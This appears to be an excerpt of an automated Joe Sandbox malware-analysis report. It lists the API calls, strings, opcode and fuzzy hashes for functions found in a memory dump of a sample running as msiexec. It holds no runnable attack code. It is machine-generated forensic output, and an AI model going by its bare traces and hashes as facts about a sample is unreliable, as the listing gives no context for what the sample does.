                                                                      • Instruction ID: 6e06d661e179051d6303c1013900a6e5c00fd457a34177cb37a2705ba00c9068
                                                                      • Opcode Fuzzy Hash: 49e580325b1ac44ac77cea4f14661dbded7e9a4fc7592e14ed5ffb05533c48ce
                                                                      • Instruction Fuzzy Hash: 01F049B680122CBEFB05AB949CC9DEB77ACEB05254F0000A2B715D2082E6749F448BA9
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcscpy$CloseHandle
                                                                      • String ID: General
                                                                      • API String ID: 3722638380-26480598
                                                                      • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                      • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                      • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                      • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                      APIs
                                                                        • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                                                                        • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                                                                        • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                                                                      • SetBkMode.GDI32(?,00000001), ref: 004143A2
                                                                      • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                                                                      • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                                                                      • GetStockObject.GDI32(00000000), ref: 004143C6
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                                                                      • String ID:
                                                                      • API String ID: 764393265-0
                                                                      • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                      • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                                                                      • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                                                                      • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                                                                      APIs
                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                                                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                                                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: Time$System$File$LocalSpecific
                                                                      • String ID:
                                                                      • API String ID: 979780441-0
                                                                      • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                      • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                                                                      • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                                                                      • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                                                                      APIs
                                                                      • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                                                                      • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                                                                      • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$DialogHandleModuleParam
                                                                      • String ID:
                                                                      • API String ID: 1386444988-0
                                                                      • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                      • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                                                                      • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                                                                      • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@
                                                                      • String ID:
                                                                      • API String ID: 613200358-0
                                                                      • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                      • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                      • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                      • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00411D71
                                                                      • InvalidateRect.USER32(?,00000000,00000000), ref: 00411DC1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: InvalidateMessageRectSend
                                                                      • String ID: d=E
                                                                      • API String ID: 909852535-3703654223
                                                                      • Opcode ID: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                      • Instruction ID: 9534a32422cce1c6391a187da628b0196a645ea69cbd0f5c6bc65931d7846800
                                                                      • Opcode Fuzzy Hash: d50188de171b89ef93dcf19ee585c83eb13d29586f1846fcb2bff02c85403588
                                                                      • Instruction Fuzzy Hash: 7E61E9307006044BDB20EB658885FEE73E6AF44728F42456BF2195B2B2CB79ADC6C74D
                                                                      APIs
                                                                      • wcschr.MSVCRT ref: 0040F79E
                                                                      • wcschr.MSVCRT ref: 0040F7AC
                                                                        • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                                                                        • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$memcpywcslen
                                                                      • String ID: "
                                                                      • API String ID: 1983396471-123907689
                                                                      • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                      • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                                                                      • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                                                                      • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                                                                      APIs
                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                      • _memicmp.MSVCRT ref: 0040C00D
                                                                      • memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer_memicmpmemcpy
                                                                      • String ID: URL
                                                                      • API String ID: 2108176848-3574463123
                                                                      • Opcode ID: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                      • Instruction ID: e2f67ed442a0be3002cd5c838a3b557e7d557c6bd05ddcbc6cfa09d4dad31ce1
                                                                      • Opcode Fuzzy Hash: 0ffae9aaa7e8776105f4b8355cfdff3a17deb021c318058ed5e09a60dc4caa80
                                                                      • Instruction Fuzzy Hash: 03110271600204FBEB11DFA9CC45F5B7BA9EF41388F004166F904AB291EB79DE10C7A9
                                                                      APIs
                                                                      • _snwprintf.MSVCRT ref: 0040A398
                                                                      • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintfmemcpy
                                                                      • String ID: %2.2X
                                                                      • API String ID: 2789212964-323797159
                                                                      • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                      • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                                                                      • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                                                                      • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: _snwprintf
                                                                      • String ID: %%-%d.%ds
                                                                      • API String ID: 3988819677-2008345750
                                                                      • Opcode ID: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                      • Instruction ID: 7541af853baca77dfc804340e5f0ab0fe899c5989b891af63cf45e557cb41de3
                                                                      • Opcode Fuzzy Hash: ff7c17540168d96ed4966b56b0a467b3337874ab214ea8a90bdbbe2252cfc3dc
                                                                      • Instruction Fuzzy Hash: B801DE71200204BFD720EE59CC82D5AB7E8FB48308B00443AF846A7692D636E854CB65
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0040E770
                                                                      • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendmemset
                                                                      • String ID: F^@
                                                                      • API String ID: 568519121-3652327722
                                                                      • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                      • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                                                                      • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                                                                      • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: PlacementWindowmemset
                                                                      • String ID: WinPos
                                                                      • API String ID: 4036792311-2823255486
                                                                      • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                      • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                                                                      • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                                                                      • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                                                                      APIs
                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                                                                      • DeleteObject.GDI32(00000000), ref: 004125E7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??3@DeleteObject
                                                                      • String ID: r!A
                                                                      • API String ID: 1103273653-628097481
                                                                      • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                      • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                      • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                                                                      • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                      APIs
                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                      • wcsrchr.MSVCRT ref: 0040DCE9
                                                                      • wcscat.MSVCRT ref: 0040DCFF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: FileModuleNamewcscatwcsrchr
                                                                      • String ID: _lng.ini
                                                                      • API String ID: 383090722-1948609170
                                                                      • Opcode ID: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                      • Instruction ID: 003e7a9acac466aac22365d7a2b75ab102816a5e64793edac74c8fca87dba5cc
                                                                      • Opcode Fuzzy Hash: d415c57d84eb2c5e7c8364d47a353e5cf76fbd17fa45f1fd58641194e3ec22f3
                                                                      • Instruction Fuzzy Hash: CEC0129654561430F51526116C03B4E12585F13316F21006BFD01340C3EFAD5705406F
                                                                      APIs
                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                      • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: LibraryLoad$AddressDirectoryProcSystemmemsetwcscatwcscpy
                                                                      • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                      • API String ID: 2773794195-880857682
                                                                      • Opcode ID: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                      • Instruction ID: 520684b8054713cb13715c6c8af1848dbb459e29e8538d47b3508bbaa4bbc045
                                                                      • Opcode Fuzzy Hash: 92b59310a7696b31d56b4dabc8b2146732067b292673cf67eedff05cdcb4dbe7
                                                                      • Instruction Fuzzy Hash: 23D0C7719483019DD7105F65AC19B8336545B50307F204077AC04E66D7EA7CC4C49E1D
                                                                      APIs
                                                                      • memcpy.MSVCRT(?,?,00000000,?), ref: 0042BA5F
                                                                      • memcpy.MSVCRT(?,?,?,?), ref: 0042BA98
                                                                      • memset.MSVCRT ref: 0042BAAE
                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?), ref: 0042BAE7
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy$memset
                                                                      • String ID:
                                                                      • API String ID: 438689982-0
                                                                      • Opcode ID: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                      • Instruction ID: 797e1fd24865db6de4a95defd5ca955254a0dec7c2ff798398e4890fb9874305
                                                                      • Opcode Fuzzy Hash: ef116662622e1dd2984e515fcaedae38b96dc359db8ee055bda91140f73fb117
                                                                      • Instruction Fuzzy Hash: 1B51A2B5A00219EBDF14DF55D882BAEBBB5FF04340F54806AE904AA245E7389E50DBD8
                                                                      APIs
                                                                        • Part of subcall function 0040A13C: memset.MSVCRT ref: 0040A14A
                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040E84D
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E874
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E895
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000014), ref: 0040E8B6
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@$memset
                                                                      • String ID:
                                                                      • API String ID: 1860491036-0
                                                                      • Opcode ID: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                      • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                                                                      • Opcode Fuzzy Hash: 64ebc759205d781c7cf4e92d27d3280bf84a4b50b74f77ffe9b887a22ca43919
                                                                      • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                                                                      APIs
                                                                      • wcslen.MSVCRT ref: 0040A8E2
                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                      • free.MSVCRT ref: 0040A908
                                                                      • free.MSVCRT ref: 0040A92B
                                                                      • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free$memcpy$mallocwcslen
                                                                      • String ID:
                                                                      • API String ID: 726966127-0
                                                                      • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                      • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                                                                      • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                                                                      • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                                                                      APIs
                                                                      • wcslen.MSVCRT ref: 0040B1DE
                                                                      • free.MSVCRT ref: 0040B201
                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                      • free.MSVCRT ref: 0040B224
                                                                      • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free$memcpy$mallocwcslen
                                                                      • String ID:
                                                                      • API String ID: 726966127-0
                                                                      • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                      • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                      • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                                                                      • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                      APIs
                                                                      • memcmp.MSVCRT(?,004599B8,00000010,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408AF3
                                                                        • Part of subcall function 00408A6E: memcmp.MSVCRT(00409690,00408B12,00000004,000000FF), ref: 00408A8C
                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(00000363,004096AA,4415FF50,?), ref: 00408ABB
                                                                        • Part of subcall function 00408A6E: memcpy.MSVCRT(-00000265,004096AF,00000060,00000363,004096AA,4415FF50,?), ref: 00408AD0
                                                                      • memcmp.MSVCRT(?,00000000,0000000E,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B2B
                                                                      • memcmp.MSVCRT(?,00000000,0000000B,00000000,00409690,?,00408C27,00409690,?,00409690,00408801,00000000), ref: 00408B5C
                                                                      • memcpy.MSVCRT(0000023E,00409690,?), ref: 00408B79
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp$memcpy
                                                                      • String ID:
                                                                      • API String ID: 231171946-0
                                                                      • Opcode ID: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                      • Instruction ID: 684d12db3f6cc64b33ac9287d8c213aaad77bc3869a84850190dd4d7d2050874
                                                                      • Opcode Fuzzy Hash: cadc00b77c621a7338fc70958db42bdaca3a8748761d36a10e112d3b7644ebb1
                                                                      • Instruction Fuzzy Hash: 8411A9F1600308AAFF202A129D07F5A3658DB21768F25443FFC84641D2FE7DAA50C55E
                                                                      APIs
                                                                      • strlen.MSVCRT ref: 0040B0D8
                                                                      • free.MSVCRT ref: 0040B0FB
                                                                        • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                        • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                        • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                      • free.MSVCRT ref: 0040B12C
                                                                      • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: free$memcpy$mallocstrlen
                                                                      • String ID:
                                                                      • API String ID: 3669619086-0
                                                                      • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                      • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                      • Opcode Fuzzy Hash: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
                                                                      • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                      APIs
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ??2@
                                                                      • String ID:
                                                                      • API String ID: 1033339047-0
                                                                      • Opcode ID: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                      • Opcode Fuzzy Hash: 77d1c7bdcd1646b3b95541b6e0b18904d55dfd8e2e8227c06648e15793e87070
                                                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                      APIs
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                                                                      • malloc.MSVCRT ref: 00417407
                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                                                                      • free.MSVCRT ref: 00417425
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: ByteCharMultiWide$freemalloc
                                                                      • String ID:
                                                                      • API String ID: 2605342592-0
                                                                      • Opcode ID: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                      • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                                                                      • Opcode Fuzzy Hash: c62e76641e050cafa551b594d013d2ba0ec055e9779dbb9c6b02089c0e2d57f7
                                                                      • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.2613397301.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_400000_msiexec.jbxd
                                                                      Similarity
                                                                      • API ID: wcslen$wcscat$wcscpy
                                                                      • String ID:
                                                                      • API String ID: 1961120804-0
                                                                      • Opcode ID: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
